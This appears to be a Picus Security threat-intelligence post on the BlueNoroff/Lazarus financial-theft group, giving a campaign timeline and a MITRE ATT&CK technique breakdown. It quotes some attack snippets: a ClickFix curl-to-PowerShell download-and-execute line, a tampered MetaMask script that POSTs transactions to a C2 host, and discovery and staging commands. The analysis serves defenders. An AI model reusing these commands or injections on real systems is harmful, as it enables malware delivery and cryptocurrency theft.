Resources | Picus Security

BlueNoroff Group: The Financial Cybercrime Arm of Lazarus

Written by Umut Bayram | Jan 20, 2026 10:33:41 AM

BlueNoroff, a sub-group of the Lazarus collective dedicated to financial theft, has established a notorious reputation for high-stakes cybercrime, most notably the 2016 Bangladesh Central Bank heist, where they compromised SWIFT infrastructure to steal $81 million. Following this, they launched watering hole attacks against Polish banks before pivoting in 2017 to target cryptocurrency businesses via the SnatchCrypto campaign. Their operations evolved in 2018 to include fake software companies distributing backdoored applications, while recent years saw a focus on macOS targets in the Web3 sector through the 2023 GhostCall and GhostHire campaigns involving fake job interviews. Activity persisted into 2025 with supply chain attacks using malicious Go packages and a tactical shift to Microsoft Teams impersonation for distributing malware.

The group employs a diverse set of tactics that begins with deep reconnaissance on platforms like LinkedIn to create credible personas for spearphishing via Telegram or malicious job assessment links. They utilize a robust infrastructure of lookalike domains and modular malware developed in languages such as Rust and Go, often executing payloads via AppleScript, VBScript, or social engineering techniques like ClickFix. Persistence is achieved through methods ranging from tampering with browser extensions to creating macOS Launch Agents. Their objective is consistently supported by aggressive credential access through fake GUI prompts and extensive system discovery to facilitate large-scale financial theft.

In this post, we will examine the major historical activities of Lazarus / BlueNoroff, highlighting their evolution from banking heists to cryptocurrency targeting, and analyze the group's tactics, techniques, and procedures to understand their sophisticated financial cybercrime operations. In the end, we will show how Picus helps defend against this group.

Simulate APT Attacks with 14-Day Free Trial of Picus Platform

What Are the Major Activities of the Lazarus / BlueNoroff Group?

  • February 2016 – The group attempted to steal up to $851 million USD from the Bangladesh Central Bank, successfully stealing $81 million in a heist that involved compromising the bank's SWIFT infrastructure [1].
  • End of 2016 – After an operation was interrupted in South East Asia, Lazarus / BlueNoroff regrouped and launched a watering hole campaign targeting banks in Poland by compromising a government website frequently accessed by financial institutions [1].
  • 2017 (at least) – The group launched the "SnatchCrypto" campaign, shifting its focus from attacking banks and SWIFT-connected servers to targeting cryptocurrency businesses to steal assets [2].
  • January - April 2017– During a forensic analysis of a Command and Control (C2) server in Europe, researchers captured a short connection made from a North Korean IP address to test a bot, providing a direct link between the group and North Korea [1].
  • 2018 – Lazarus / BlueNoroff used fake cryptocurrency software development companies to trick victims into installing legitimate-looking applications that eventually received backdoored updates [2].
  • Mid-2023 – The "GhostCall" and "GhostHire" campaigns became active, targeting the macOS devices of executives in the Web3/blockchain industry by conducting fake job interviews and investment meetings [3].
  • 5 December 2023 – Securelist published a report detailing a new Trojan attacking macOS users, linking the activity to the BlueNoroff APT gang and its ongoing "RustBucket" campaign targeting financial organizations and cryptocurrency holders [4].
  • 9 April 2025 – The group published a malicious package named uniroute in the official Go packages repository as part of the GhostHire campaign to compromise developers [3].
  • September 2025 – The group was observed shifting their tactical impersonation from Zoom to Microsoft Teams, using fake "TeamsClutch" applications to deceive victims during the GhostCall campaign [3].

Which MITRE ATT&CK Techniques Are Used by BlueNoroff?

Tactic: Reconnaissance

T1589 Gather Victim Identity Information

The actor leveraged compromised accounts of legitimate entrepreneurs and startup founders to initiate contact with targets, implying they first gathered the necessary credentials to access these accounts.

T1593 Search Open Websites/Domains

BlueNoroff sourced profile images from social media and professional networking sites such as LinkedIn, Crunchbase, and X. These images were used to construct deceptive personas that mimicked real professionals.

Tactic: Resource Development

T1583.001 Acquire Infrastructure: Domains

BlueNoroff registered domains that closely resembled legitimate ones, such as support.video-meeting[.]online and swissborg[.]blog, to host malicious content and Command and Control (C2) infrastructure.

T1583.003 Acquire Infrastructure: Virtual Private Server

The threat actor employed hosting services, specifically Hostwinds, to establish and maintain phishing websites designed to mimic legitimate services.

T1587.001 Develop Capabilities: Malware

The group actively developed a modular malware framework consisting of launchers, injectors, installers, and loaders. They utilized multiple programming languages, including Rust, C++, Python, Go, Swift, and Nim, to create these tools. Additionally, they created malicious packages for Go and TypeScript projects to be used in supply chain-style attacks.

T1588.002 Obtain Capabilities: Tool

The actor utilized legitimate tools such as "Calendly" to schedule fraudulent meetings.

T1598.001 Phishing for Information: Spearphishing Service

In the "GhostCall" campaign, the actor invited victims to fake video calls on phishing sites mimicking Zoom or Microsoft Teams. These sites requested permissions to access the camera and microphone to record the victim.

Tactic: Initial Access

T1566.002 Phishing: Spearphishing Link

BlueNoroff sent malicious links to targets via Telegram or LinkedIn. These links directed victims to fake meeting sites mimicking Zoom or to download malicious archives disguised as job assessments.

T1566.003 Phishing: Spearphishing via Service

The group targeted individuals through messaging platforms. They impersonated venture capitalists on Telegram to establish trust before sending malicious payloads. Also, they used Telegram bots to deliver malicious ZIP files or GitHub links under the pretense of a technical skill assessment.

Tactic: Execution

T1059.002 Command and Scripting Interpreter: AppleScript

On macOS, AppleScript was a primary execution method. Scripts disguised as software updates (e.g., Zoom SDK Update.scpt) and the osascript command, which is used to execute AppleScript, were utilized to download and run payloads [3]. An example usage of osascript is given below:

osascript /example/path/to/Malicious_File.scpt

T1059.005 Command and Scripting Interpreter: Visual Basic

On Windows, a VBScript wrapper (init.vbs) was generated to execute PowerShell scripts covertly. 

T1059.007 Command and Scripting Interpreter: JavaScript

JavaScript was employed on phishing pages to handle user interactions, such as requesting camera permissions, managing the recording and uploading of video feeds to the /upload endpoint. For instance, camera permission can be requested with navigator.mediaDevices.getUserMedia() API.

T1204.004 User Execution: Malicious Copy and Paste

A "ClickFix" technique involved placing a malicious command shell command into the clipboard for the user to execute the malicious actions [3]:

cmd

"<TRUNCATED COMMANDS>"
curl -A ZoomSDK -s <download URL> | powershell.exe -c "[Console]::In.ReadToEnd() | iex"

Tactic: Persistence

T1176.001 Software Extensions: Browser Extensions

BlueNoroff targets cryptocurrency wallets by replacing the core component (background.js) of the Metamask extension with a tampered version to monitor transactions.

// Malicious injection in Metamask background.js
if (txr.txParams.From.toLowerCase() == Fromaddr.toLowerCase()) {
    try {
        let x_http2 = new XMLHttpRequest();
        // ... sends data to C2
        x_http2.open("POST", "http://<C2 Domain>/geteth.php", true);
        x_http2.send(x_data2);
    } catch (err) {}
}

T1543.001 Create or Modify System Process: Launch Agent

On macOS, BlueNoroff created Launch Agents (e.g., com.applet.safari.plist) in ~/Library/LaunchAgents/ to ensure malware execution at login. Keys like RunAtLoad and KeepAlive were set to true [3].

T1543.004 Create or Modify System Process: Launch Daemon

Launch Daemons were created on macOS (e.g., com.apple.updatecheck). These were loaded using launchctl commands.

launchctl unload <plist file>
launchctl load <plist file>

T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Persistence is achieved by placing VBS scripts or shortcuts in the Windows Startup folder.

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\check.vbs
%APPDATA%\microsoft\windows\start menu\programs\startup\guide.vbs

Tactic: Privilege Escalation

T1055 Process Injection

The threat actor employs various injection techniques across different malware variants. On Windows, the "peshooter" function within the RooTroy and CosmicDoor malware injects payloads into legitimate processes like notepad.exe. On macOS, the GillyInjector utilizes task injection to inject malicious payloads into other processes [3].

T1548.006 Abuse Elevation Control Mechanism: TCC Manipulation

On macOS, a downloader script used by BlueNoroff actively bypasses Transparency, Consent, and Control (TCC) protections. It renames the user's com.apple.TCC directory and directly modifies the TCC.db database using INSERT OR REPLACE statements. This allows the malware to grant itself unauthorized permissions, such as access to Documents, Downloads, Desktop folders, and AppleEvents, without user consent [3].

T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control

To gain elevated privileges on Windows, the actor utilizes a UAC bypass tool leveraging an RPC-based method. This technique leverages the 201ef99a-7fa0-444c-9399-19ba84f12a1a interface. This allows the actor to execute the initial DownTroy script and subsequent payloads with high privileges [3].

Tactic: Defense Evasion

T1027.002 Obfuscated Files or Information: Software Packing

The "Bof loader" was protected using "Themida," a commercial packer, to complicate analysis.

T1027.010 Obfuscated Files or Information: Command Obfuscation

Scripts and payloads were obfuscated to hide their contents. For example, PowerShell scripts used XOR encryption and AppleScript files included thousands of blank lines to conceal malicious code. Additionally, Base64 encoding and RC4/AES encryption were used for payloads and configurations.

T1036.005 Masquerading: Match Legitimate Resource Name or Location

Malware components disguised themselves as legitimate files. For example, binaries used names like trustd, watchdog, or Google LLC, and fake applications mimicked "Zoom" or "Microsoft Teams" with identical icons. Also, malicious plists mimicked Safari components.

T1562.001 Impair Defenses: Disable or Modify Tools

"RooTroy" and "Bof Loader" unhooked ntdll.dll on Windows to bypass API hooking used by security products.

Tactic: Credential Access

T1056.002 Input Capture: GUI Input Capture

On macOS, the ZoomClutch and TeamsClutch malware display fake password prompt windows that mimic legitimate system authentication dialogs. These prompts trick victims into entering their passwords, which are then validated against the local Open Directory. Once validated, these credentials are used to execute commands with root privileges, facilitating the installation of root-level persistence mechanisms.

T1552.001 Unsecured Credentials: Credentials In Files

A script, which is named secrets.sh and found in the SilentSiphon suite, searched for and stole files containing credentials, such as configuration files for AWS, Google Cloud, and Azure (.aws, .config/gcloud), as well as SSH keys and package manager configs.

Tactic: Discovery

T1016 System Network Configuration Discovery

The threat actor executed commands to gather network configuration data.

ipconfig /all>[Output File] 2>&1
arp -a>[Output File] 2>&1

T1018 Remote System Discovery

BlueNoroff utilized the ping command to discover remote systems.

ping -n 1 [Redacted IP] > [Output File] 2>&1

T1082 System Information Discovery

A trojan used by BlueNoroff collects system information like computer name, OS version, time zone, processes, and prepares it for transmission to the C&C server every minute.

T1087.001 Account Discovery: Local Account

 Attackers enumerate local users and administrator groups.

cmd.exe /c "net user [Username] /domain >[Output File] 2>&1"
cmd.exe /c "net localgroup administrators >[Output File] 2>&1"

Tactic: Collection

T1005 Data from Local System

The threat actor searches for and collects specific files, such as cryptocurrency configuration files or policy documents [2].

cmd.exe /c "type D:\2\Crypt[redacted]\Crypt[redacted].conf >[Output File] 2>&1"

T1074.001 Data Staged: Local Data Staging

The attackers create specific directories to stage data before exfiltration.

cmd.exe /c "mkdir %public%\MM >%temp%\TMPF522.tmp 2>&1"
xcopy "%user%\Desktop\[redacted]工作文档\MM策略档案" %public%\MM/S/E/Q/Y

Tactic: Command and Control

T1071.001 Application Layer Protocol: Web Protocols

The malware utilized the cURL library to communicate with C2 servers via HTTP/HTTPS [5].

curl -A cur1-agent -L [payload URL(| -x proxy URL)] -s -d da

Tactic: Impact

T1657 Financial Theft

BlueNoroff is financially motivated and has been observed stealing cryptocurrency worth millions, utilizing their cyberattack capabilities for profit.

How Picus Simulates BlueNoroff Group Attacks?

We also strongly suggest simulating BlueNoroff Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for the BlueNoroff Group:

Threat ID

Threat Name

Attack Module

54002

BlueNoroff Threat Group Campaign Malware Download Threat

Network Infiltration

68160

BlueNoroff Threat Group Campaign Malware Email Threat

E-mail Infiltration

47104

GhostHire Campaign Malware Download Threat

Network Infiltration

35520

GhostHire Campaign Malware Email Threat

E-mail Infiltration

81005

GillyInjector Malware Dropper Download Threat

Network Infiltration

73326

GillyInjector Malware Dropper Email Threat

E-mail Infiltration

22312

APT38 Threat Group Campaign Malware Dropper Download Threat

Network Infiltration

98859

APT38 Threat Group Campaign Malware Dropper Email Threat

E-mail Infiltration

98288

BlueNoroff Threat Group Campaign

macOS Endpoint

89564

NukeSped Malware Campaign

macOS Endpoint

73913

NukeSped Backdoor Malware Download Threat

Network Infiltration

45307

NukeSped Backdoor Malware Email Threat

E-mail Infiltration

72931

APT38 Threat Group FASTCash 2.0 Campaign

Windows Endpoint

68591

RustBucket Trojan Download Threat

Network Infiltration

55476

RustBucket Trojan Email Threat

E-mail Infiltration

92626

ObjCShellz Web Shell Email Threat

E-mail Infiltration

91835

ObjCShellz Web Shell Download Threat

Network Infiltration

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

Key Takeaways

  • BlueNoroff operates as a financially motivated subgroup of the Lazarus collective, transitioning from compromising SWIFT infrastructure in banking heists to targeting cryptocurrency assets in the Web3 sector.
  • Recent campaigns such as GhostCall and GhostHire target macOS users through fake job interviews, while 2025 activity involves supply chain attacks via malicious Go packages and Microsoft Teams impersonation.
  • The group conducts deep reconnaissance on platforms like LinkedIn to create credible personas, delivering malicious payloads through spearphishing links on Telegram or lookalike domains mimicking services like Zoom.
  • Attackers utilize a diverse technical arsenal, including modular malware in Rust and Go, AppleScript for execution on macOS, and the ClickFix social engineering technique to deceive users into running malicious commands.
  • Persistence strategies include tampering with browser extensions, creating macOS Launch Agents, and placing VBS scripts in Windows Startup folders.
  • Picus helps defend against these threats by allowing organizations to simulate APT attacks and validate defenses against BlueNoroff tactics through the Picus Platform.

References

[1] GReAT, “Lazarus Under The Hood,” Kaspersky. Accessed: Jan. 14, 2026. [Online]. Available: https://securelist.com/lazarus-under-the-hood/77908/

[2] S. Park, “The BlueNoroff cryptocurrency hunt is still on,” Kaspersky. Accessed: Jan. 14, 2026. [Online]. Available: https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/

[3] S. Ryu, “Crypto wasted: BlueNoroff’s ghost mirage of funding and jobs,” Kaspersky. Accessed: Jan. 14, 2026. [Online]. Available: https://securelist.com/bluenoroff-apt-campaigns-ghostcall-and-ghosthire/117842/

[4] S. Puzan, “BlueNoroff: new Trojan attacking macOS users,” Kaspersky. Accessed: Jan. 14, 2026. [Online]. Available: https://securelist.com/bluenoroff-new-macos-malware/111290/

[5] S. Park, “BlueNoroff introduces new methods bypassing MoTW,” Kaspersky. Accessed: Jan. 19, 2026. [Online]. Available: https://securelist.com/bluenoroff-methods-bypass-motw/108383/